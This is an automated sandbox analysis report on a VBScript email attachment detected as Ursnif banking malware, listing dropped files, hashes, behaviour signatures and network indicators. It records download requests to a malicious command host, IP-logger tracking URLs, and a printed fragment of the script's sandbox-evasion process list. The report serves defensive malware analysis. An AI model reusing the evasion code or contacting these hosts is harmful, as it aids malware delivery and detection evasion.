Analysis Report attach_12.12.2020-4570.vbs

ID:	330430
Product:	CloudBasic
Start time:	22:44:16
Start date:	14.12.2020
Sample:	attach_12.12.2020-4570.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	f32557ed329503fac0bf315e4dd49a19
SHA1:	852ed7bbaf2194b79f4acbc971f9f65fb52ef5fb
SHA256:	40b30d76c89557b0a3c59dab61726f0514202cd6760a26e7d2722bcee462bfbf

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3CE1DE67-3EA1-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	7F90002C05CE842FA742A6A95130477F	810563E604F38EAA62C937666367B6BB0B6F5DCD	4997F106593FD06508D886AA16C18BC55EB0254DBBF6856A2F0FF291A5134388
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{3CE1DE69-3EA1-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	F58BC57AD67B0F72AD6FD1D62F9C7338	5FEF4101FB5B23F72D83B0381E226C8161ED57A7	20BA24693F5EF940608C912C755E4E04BA4B5D228F693801DBFD85C1C77FD809
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	A662EC735B66AB4F9BFE32F5FBBE18C2	255A03BF2B13740F069D7B2B485A6B8C4564AD52	5F86D0AF194884867CA7FA1AC45C0E50089D2C686C57C321F87EE78A7C886721
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	082B97DDD40FBB0C962E6B27E03D09E4	2E35C93E0C543A1D0E3983954A77A3950C070EC5	DD067A4CDF6E149FCEE75A81C9A9312E0602309B37686CC0C6057A0964C5B2A3
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	5CE5195EAE9711329525C2DBA115DB8B	0EF40AA39B45EB03A748BCF5F5C6D358B898117A	EE8680680EF1DB9FD310035D25882DC5B249F32352CCDCD84B39DE9AB19AD094
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	7C439525198866B74A5646C9EB39BFDE	3DA6046CC748017CE0C552FBD2195FB3CE64B2E2	A90BB12A7D5A13AAEA17050CD5A49D37F8282916A0B8EFE2F42F599B1C1037B8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	7002AF50F52263457CD5DBB05821C006	083B6544101D92D0DBD678EE08054FA59B4AAF26	FC53265D11605E91DE7689AAAC20021233D93BD4E7B51C1D37EC72F52AA75A01
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	85F51F10FE17B06DCD50DDCE6D514C43	A887CF6F51BD7658D86CAD009434D0DFD368E892	EBE02D9FA074D3C8F222CBB03EC5E60C5E39BA26223E5DF98D3403E66A362BD2
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	F1805AFC3A3FC5BC6BBD91195C67B1B6	C72EA2A60032B50C90DF7FB4DEDD4BD20F6FB272	A077B36ACCAC7FD3A9883506AAA3EDD68AC0AC3318306031DE473BBA73C9EA20
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	706533922003258126BC16C98F8EAC0D	23347078B5AAA1B081CBFF68BBE7128F7C294D07	D6ACA79E66AF04F89E3599844B19CDB0D0CC4B8C8B3AE81C8830F45EB0FD58FF
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	612D7C7FCF8A4428486E3779F4CF6875	F480C7F4A918800753FB9A90FE40B4D9BB1E9600	EDF823642129FB9B3D21418E7643D5155A3BAC1A6E4326E9E8817BB3ABBCD48E
C:\Users\user\AppData\Local\Temp\Baudelaire.ttf	ASCII text, with no line terminators	1D4487C6F53B3D4B0E4B4EFE7001FB79	4827CA1405BFD570E8AEC0C06CED985B0EDF5B7C	CCA57B3CFB4B197CB9BC0536AF10F7510287512B458FF40C01FFD62814C94902
C:\Users\user\AppData\Local\Temp\Brookhaven.rpm	ASCII text, with no line terminators	5FBB9955E6F4CC7722939AA88D88F554	655EB0989F3BCDCE24F09B4436612DD41F22ABFB	5314EA93E054D95DE460C1D6F6F9EC554242EE58C992E51BB4568A97F9FFFA46
C:\Users\user\AppData\Local\Temp\Gerhardt.po	ASCII text, with no line terminators	5701031A3E1B102200A57126F6D5B853	188D8E047BEDB4F85C6B55C72966E17822DCB92C	54B7972D565213962120552252C86FCF1A092772453BAD27FE67AC28CF84F6A2
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	6113DA501DD49CE4EC4371BF09623403	C6701A2FD5B7BB3646696C69C35F60190F20A061	6A1C3300269D4CF8ECDA2ECE8D262CDC05B25B8DF324082D76FAC38340C627CC
C:\Users\user\AppData\Local\Temp\Judy.mp2	ASCII text, with no line terminators	A89F15BC815D1D5477F83EA8FD4CCD7F	E3D465C4FA64985BE733CA0D0E2B907C4EBF09E9	599269758C5F0B576DCFD0889416326DF76562FCCF434B3BB9C073A0FB30B877
C:\Users\user\AppData\Local\Temp\acquittal.war	ASCII text, with no line terminators	B4B6356F4BC7859537399B977E3C2164	F5F7040971716D56D4A1D031E6D41DE724F0F870	EBD175F434CED52DD6D90D16A4FAE55C40EE7939CE1CC5324A7C6004506DF90E
C:\Users\user\AppData\Local\Temp\adobe.url	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators	99D9EE4F5137B94435D9BF49726E3D7B	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
C:\Users\user\AppData\Local\Temp\byproduct.lha	ASCII text, with no line terminators	AAE9D9F1C4E8879D7FDA64E7556CDA6F	43720BC08E2CBC351884533F8EA162269F448219	CE7AB485D8383747C124C5592F09A15A32FBFD6C8C5C0C48D0F1C0ED158C0994
C:\Users\user\AppData\Local\Temp\chapel.lha	ASCII text, with no line terminators	6BD5E851524E2F5FB89225CE564F2782	46EEA6DBB9E154696F50FC4FD1FC55F8A0F34D1E	F489434078372F924842498F69D783BE6F6316B5A429AD5FA909A06CD1FB977D
C:\Users\user\AppData\Local\Temp\civet.lha	ASCII text, with no line terminators	710D38387B3EA19B58D12DB5F086BE34	D8AE706471D21F3828FC1C3969FE7584C0377C21	26BD7D76AA6F1AD3DD61AB03E67ED2405B253F7C1BA37E231F4FB35F5F1045A0
C:\Users\user\AppData\Local\Temp\crutch.ppt	ASCII text, with no line terminators	E2248DA3B8ECEE80F9A5F9CF7D225E41	68837802704266484D7523D51C5EE5740B67AC94	2A2CD366A484DA6FFC0B2D757F893E7E930F699AC935D17C42512F45FA9F5C40
C:\Users\user\AppData\Local\Temp\dean.mng	ASCII text, with no line terminators	194F01AA1820D5BE8EAFD41C067DF794	A48B2CB244CC59F000C90101FF26A3BE006ACF7D	D1E65F1D2708E52C926C0F10ABC05775D81262E809FC9F06F4ACDCAC3984B440
C:\Users\user\AppData\Local\Temp\determinant.webm	ASCII text, with no line terminators	8F9021E0D73C190D38EEFDD89E0C28D2	E822A73FDF744DF37F2FB44FD78A566642A2E7F2	342B29960A4BCA481D4C76A1CD47D6F24E8283F47EB4969D69E7E4A86EB1CC4B
C:\Users\user\AppData\Local\Temp\epigrammatic.ps	ASCII text, with no line terminators	D1CB1F7B7344D4E20F5F87B152208B01	838B10488C6F39ED4D4DDCEA6EB5E1815E1BC6DF	DD71063617C0215F4A8DCEC17645DC6A3BCF7D11DD327DB3BCAD484E03330AF5
C:\Users\user\AppData\Local\Temp\fought.whl	ASCII text, with no line terminators	9D65F16E098842483B3948C87287A5EA	94817F8CD7458C4E9F52F3EB334EB6CB7157B357	21E5A4AD597C25261155157945674143DED7C1EA5D50912F0F4C9B8FC84096F5
C:\Users\user\AppData\Local\Temp\gaff.mpv	ASCII text, with no line terminators	5D7C7932AFE6CF3F02DE01333B555831	54486B96C20CFC89A782447D9E1D368CF2DAD3D6	E40E00D26E430106437ECA80B64037E645ADB2AE05F281A3979340117A13843F
C:\Users\user\AppData\Local\Temp\gullet.cc	ASCII text, with no line terminators	968B02C47CF160CABDFD6663BE15CDEB	E2569254F3BFCE5C90C74FABC518BFFDB6A075D5	AE83F01BEC7BEE5235BDD8F0A0866407E0F80C0C4B83F18BC99DDF6B4F086BC7
C:\Users\user\AppData\Local\Temp\gully.xml	ASCII text, with no line terminators	B881B4C44E77C7F0B1FF8B4B6D8FD30F	BF08CCE311EC85C3619BD218A996C7BD149D08F2	0C348972523CC4B8A768611A1D604D3916CBF6366B6B94F023313AA9EE5D5D1A
C:\Users\user\AppData\Local\Temp\hollandaise.m4p	ASCII text, with no line terminators	A0CDE6777E605BD3BBBFD5F615F22C89	CA4F65D39808FDACA78C3C2717AFAEB66DCCCDC4	BA9DAAA74E9DBB5AF2889B14794CE05AC83068996D1C6848E9B17D5D048F42BD
C:\Users\user\AppData\Local\Temp\krypton.zip	Zip archive data, at least v2.0 to extract	0600604C2DC50F282B211B18CE7E9278	F14A234D4D37970809F0461967B6ADE6366E6F6F	EFCF60971CAB4A6C2CE1C907C7F3E873634355E594BF9B594BDEF5084DA9019A
C:\Users\user\AppData\Local\Temp\marquess.cpp	ASCII text, with no line terminators	1BD66A2C94554E6DF2713F37BEE9AC60	C2586226F7D41A03F1126E6B5F6811D3D1EC2A8E	2D645C9A8DFAAC52EB2B5208150058F2988DBBA55675D7572A7733C709EC2DE9
C:\Users\user\AppData\Local\Temp\mend.less	ASCII text, with no line terminators	B3889A0709839C3FC875B8DE748FF468	E2441900550A9BC4FFF81FC3F1DE5387286A9F67	09950CDB84892ECAD1AF72709339A1971D00DF689419643A23366C906997E856
C:\Users\user\AppData\Local\Temp\menopause.patch	ASCII text, with no line terminators	A02FE17A675F386735D88CCBFA305911	B2CEC661C40F10AFD178B6EAEABB4DCAF47ACFAF	CBDC1B9718996A9A02231FB3BEF48E46581E13C01019B79CF4D7FC663B070FC0
C:\Users\user\AppData\Local\Temp\metamorphose.xz	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	03A4ADF216161ACEABAF8B9CBDE58308	5B37A2BDC58279F1F1E31038FFF1F859EEC76CF6	E0E9821E1C172EE90B6EA27D96A0E9053269FB48BCBE7EC4FB42E048DA9F4E8A
C:\Users\user\AppData\Local\Temp\paragraph.ra	ASCII text, with no line terminators	00CF22ACDB90137DC77A37C35C5E6D90	85BF279BEDB1856D44764F829A1048F537452D38	E967867B2071419FE5494DF9C0459B35C36A5A3D36B03959727EBF4CA6BB4B83
C:\Users\user\AppData\Local\Temp\reminisce.swift	ASCII text, with no line terminators	EC046E39F86249AA569D9CD3BAA8B2DB	68A2A9020E51533E8B0734F85B2D47C282FC0BD2	A765D00FE36F83F6F032CD9A1CD44F553B401BA01FF3D1F63432F4F71700EAC1
C:\Users\user\AppData\Local\Temp\screwbean.go	ASCII text, with no line terminators	2F220E3C302AE17F796BB25D57AA2986	9EAE07F1C3B326F6F1D25440A4C3874CFFFDDC76	7AC3FE8334685E9529BD7B51F9B916AD8770A9173FB23ACEF6B396EF3BECA57F
C:\Users\user\AppData\Local\Temp\throat.el	ASCII text, with no line terminators	D4645DA707A8FA4F35C39605A2E236D0	D0BD767C97092E4C6ECB1626CDECC69388046F9A	B0625B771FDB54752C7DE593B24ABDF781A1CE09C8D1E372191E02EDBD73FF2A
C:\Users\user\AppData\Local\Temp\trickster.tlz	ASCII text, with no line terminators	E21A10AE9035C8092308DDC4271FDB1B	E559A10DF8B4BCE057F468A910D09E5E78089C4D	225FB2C497CA5872DB5D9C4039AD1FD156A5A6986EA1D50867A9B2EBACA9836B
C:\Users\user\AppData\Local\Temp\warden.xpi	ASCII text, with no line terminators	570EFE4A9426249002A4FE9E3ED4FF3B	BA399A4F1C8BF977F9F4440171231A517158486C	8AFC1A447FCD23939090B77CE12FFBF62FBFD80D33B8EB634BF02A1B323E6799
C:\Users\user\AppData\Local\Temp\~DF0C08EFA087ABAB68.TMP	data	2EEF667008F8643FA9D944580EF85385	456D5F484D3E8E10369198ADA1C49B0E76806A9C	4795015D499141A162D92047FB7EED7BED488FC07BCC3DC52155533952E8405E
C:\Users\user\AppData\Local\Temp\~DFCDB445B3E37A497E.TMP	data	940BEE97BE92319726816DBFEBB489A2	47A7271B0815A0ECE5EC8626B6D18965348B89A2	AF9765DC949FC72D564225F37C6EF81556271D843AAF31233926541B6A37B58E

AV Detection:

Multi AV Scanner detection for submitted file

Source: attach_12.12.2020-4570.vbs

Virustotal: Detection: 24%

Perma Link

Spreading:

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox View	IP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox View	IP Address: 47.241.19.44 47.241.19.44

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /api1/SiXXDEY8/DymoFuqRTM5804vezWS2VRz/lB1JNXfT7v/SXOQPNWY58uhmU2LS/ZsNv1dDQJ456/Mu6Te_2FHsV/eNDunFhZlDIcIC/J1g3aMt9Nb_2FlRJqw4Li/dEyBd7JFKosGNHrP/FR7GWgofr4bpyWm/jXpb7LTZnU7ZcIM4RF/E2EbYys_2/BVceSLr9iBS7D0quHXAf/VlMzOoG4ARuaEUhlaxt/tPAWXkHmWI21zOQvyd3z9g/mj42TaP0aEJWJ/5JxOgtv5/JR_0A_0Dooq_2FmMow6MDgZ/jLnv9D8dM0/mbIQG7M783PO4Eg3_/2FtuAUSBrChb/WNA5RcatpZV/BRyqw7S HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive

Found strings which match to known social media urls

Source: msapplication.xml0.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x12f3c910,0x01d6d2ae</date><accdate>0x12f3c910,0x01d6d2ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x12f3c910,0x01d6d2ae</date><accdate>0x12f3c910,0x01d6d2ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x12f88d94,0x01d6d2ae</date><accdate>0x12f88d94,0x01d6d2ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x12f88d94,0x01d6d2ae</date><accdate>0x12f88d94,0x01d6d2ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x12faefe1,0x01d6d2ae</date><accdate>0x12faefe1,0x01d6d2ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.24.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x12faefe1,0x01d6d2ae</date><accdate>0x12faefe1,0x01d6d2ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: yip.su

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Dec 2020 21:46:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Urls found in memory or binary data

Source: wscript.exe, 00000000.00000003.265314459.000001E97CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wscript.exe, 00000000.00000003.265314459.000001E97CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000003.265314459.000001E97CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.265314459.000001E97CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.265314459.000001E97CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: {3CE1DE69-3EA1-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DF0C08EFA087ABAB68.TMP.24.dr	String found in binary or memory: http://golang.feel500.at/api1/SiXXDEY8/DymoFuqRTM5804vezWS2VRz/lB1JNXfT7v/SXOQPNWY58uhmU2LS/ZsNv1dDQ
Source: wscript.exe, 00000000.00000003.265314459.000001E97CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000003.265314459.000001E97CFC9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: msapplication.xml.24.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.24.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.24.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.24.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.24.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.24.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.24.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.24.dr	String found in binary or memory: http://www.youtube.com/
Source: wscript.exe, 00000000.00000003.259056830.000001E97B963000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.283844962.000001E97B951000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.258987745.000001E97B950000.00000004.00000001.sdmp	String found in binary or memory: https://ezstat.ru/1DpE37
Source: wscript.exe, 00000000.00000003.282269991.000001E97B98A000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.259056830.000001E97B963000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.com/1DdE37
Source: wscript.exe, 00000000.00000003.283844962.000001E97B951000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.283445063.000001E900770000.00000004.00000001.sdmp	String found in binary or memory: https://yip.su/1DiE37
Source: wscript.exe, 00000000.00000003.257991365.000001E97F5A8000.00000004.00000001.sdmp	String found in binary or memory: https://yip.su/1DiE370)
Source: wscript.exe, 00000000.00000003.257991365.000001E97F5A8000.00000004.00000001.sdmp	String found in binary or memory: https://yip.su/ta
Source: wscript.exe, 00000000.00000003.257543744.000001E97D34C000.00000004.00000001.sdmp	String found in binary or memory: https://yip.su/v

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.363949393.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363973490.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363868839.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363828372.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363793601.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375177538.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363915717.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363991064.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363760617.00000000056D8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.363949393.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363973490.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363868839.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363828372.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363793601.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375177538.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363915717.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363991064.00000000056D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.363760617.00000000056D8000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Java / VBScript file with very long strings (likely obfuscated code)

Source: attach_12.12.2020-4570.vbs

Initial sample: Strings found which are bigger than 50

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: metamorphose.xz.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal96.troj.evad.winVBS@4/43@2/2

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Creates temporary files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Executes visual basic scripts

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\attach_12.12.2020-4570.vbs'

Queries process information (via WMI, Win32_Process)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Reads ini files

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: attach_12.12.2020-4570.vbs

Virustotal: Detection: 24%

Spawns processes

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\attach_12.12.2020-4570.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2576 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2576 CREDAT:17410 /prefetch:2			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Submission file is bigger than most known malware samples

Source: attach_12.12.2020-4570.vbs

Static file information: File size 1313783 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: c:\colorEarth\energySend\RiseRide\SisterFlower\waveBear\Product.pdb source: wscript.exe, 00000000.00000003.256867080.000001E97F496000.00000004.00000001.sdmp, metamorphose.xz.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.ScriptName, cStr(559472789)) > 0 And dust = 0) ThenREM ha Seward harm. access pearlstone brookside dove woodyard renovate Siamese messianic cotta spectrograph caveat shaven Exit FunctionREM koala tangle. schoolmarm paprika jibe enumerate deaconess parameter. now284 memorial oligarchic aspen insensible Injun711 End IfvoZIehjd = (((88 - 34.0) + (-(14 - 5.0))) - 45.0)ziLKM = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.